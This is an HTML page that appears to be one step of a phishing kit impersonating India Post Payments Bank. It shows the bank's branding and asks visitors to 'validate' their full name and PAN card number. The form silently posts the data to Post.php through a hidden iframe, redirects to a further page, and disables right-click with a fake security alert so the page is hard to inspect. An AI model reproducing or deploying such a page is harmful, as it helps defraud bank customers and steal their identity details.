<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
    <title>India Post Payment Bank Secure Details/login</title>
    <style>
        #mm
        {
            width: 104%;
            margin:-8px;
            margin-left:-6px;
        }
         #ft
         {
         width: 104%;
         margin-left:-6px;
         }
        #bb,#dd
        {
            width: 280px;
            height:30px;
            padding:3px 10px;
            background-color:white;
            border-style:solid;
            outline:none;
            border-color:#AE2924;
            border-width:1px;
            color:#AE2924;
            font-size:15px;
            font-weight: bold;
            font-style: italic;
            margin:2px;
            border-radius:4px;
            margin-left:20px;
        }
        
        #bb:hover
        {
        width: 280px;
        height:30px;
        padding:3px 10px;
        background-color:white;
        border-style:solid;
        border-color:#AE2924;
        outline:none;
        box-shadow:0 0 6px 0 #AE2924;
        border-width:1px;
        color:#AE2924;
        font-weight: bold;
        font-style: italic;
        margin:2px;
        border-radius:4px;
        margin-left:20px;
        }
        
        #dd:hover
        {
        width: 280px;
        height:30px;
        padding:3px 10px;
        background-color:white;
        border-style:solid;
        border-color:#AE2924;
        outline:none;
        box-shadow:0 0 6px 0 #AE2924;
        border-width:1px;
        color:#AE2924;
        font-weight: bold;
        font-style: italic;
        margin:2px;
        border-radius:4px;
        margin-left:20px;
        }
        #cc
        {
            width:104%;
            margin-left:-6px;
        }
        #ll
        {
            background-color:#AE2924;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px; width: 120px; height: 36px;
        }
        #ll:hover
        {
        background-color:#3E1128;
        color: white;
        padding: 0px 0px;
        margin: 10px 25px;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        font-size: 16px; width: 120px; height: 36px;
         }
        #cc
        {
        width:102%;
        background-color:#3E1128;
        height:72px;
        margin:12px;
        margin-left:-6px;
        }
        #col
        {
        width:104%;   
        background-color:#D8D1DB;
        height:490px;
        margin:-6px;
        margin-left:-7px;
        }
        input::-webkit-input-placeholder {
        font-style: italic;
        }
        input:-moz-placeholder {
        font-style: italic;
        }
        input::-moz-placeholder {
        font-style: italic;
        }
        input:-ms-input-placeholder {
        font-style: italic;
        }
    </style>
    <script language="javascript">
    
    var message="For security reasons,This function is not allowed here.";
    function clickIE4(){
    
    if (event.button==2){
    alert(message);
    return false;
    }
    }
    
    function clickNS4(e){
    if (document.layers||document.getElementById&&!document.all){
    if (e.which==2||e.which==3){
    alert(message);
    return false;
    }
    }
    }
    
    if (document.layers){
    document.captureEvents(Event.MOUSEDOWN);
    document.onmousedown=clickNS4;
    }
    
    else if (document.all&&!document.getElementById){
    document.onmousedown=clickIE4;
    }
    
    document.oncontextmenu=new Function("alert(message);return false;")
    
    </script>
</head>
<body>
    <!-- Static- Please don't do anything here-->
    <script type="text/javascript">var submitted=false;</script>
    <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='4th.html';}"></iframe>
    <!--My Form-->
    <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
   <center><img src="indiapost.png" alt="" id="mm"></center>
    <div id="col">
    <div id="cc">
    <br>
    <b style=" color:white; font-size:16px; padding:20px;"> Validate your PAN card details and<br>
    <span style="color:white; font-size:16px; padding:20px;"> Proceed.</span></b>
    </div><br>
       <div id="pp"> 
        <b style="font-family: Arial; 
        color:#AE2924; 
        padding:0px 20px; font-size:16px;"><i>Enter Full Name* (<b>as per PAN</b>)</i></b>       
    </div>
     <div id="fr">
         <input type="text" name="Full Name" id="bb" placeholder="Enter Name (as per PAN)" 
          required=""></div><br>
         <div id="hh">
         <b style="font-family: Arial; 
         color:#AE2924; 
         padding:0px 20px; font-size:16px;"><i>Enter PAN Number*</i></b>
        </div>
        <div id="xx">
         <input type="text"name="PAN No." id="dd" placeholder="Enter PAN Number"
          required="">
          </div><br><br>
        <div id="qq">
        <button type="submit"id="ll" style="font-weight: bold;">
        SUBMIT</button>
         </div>
         </div>
         <img src="footeri.jpg" alt="" id="ft">
         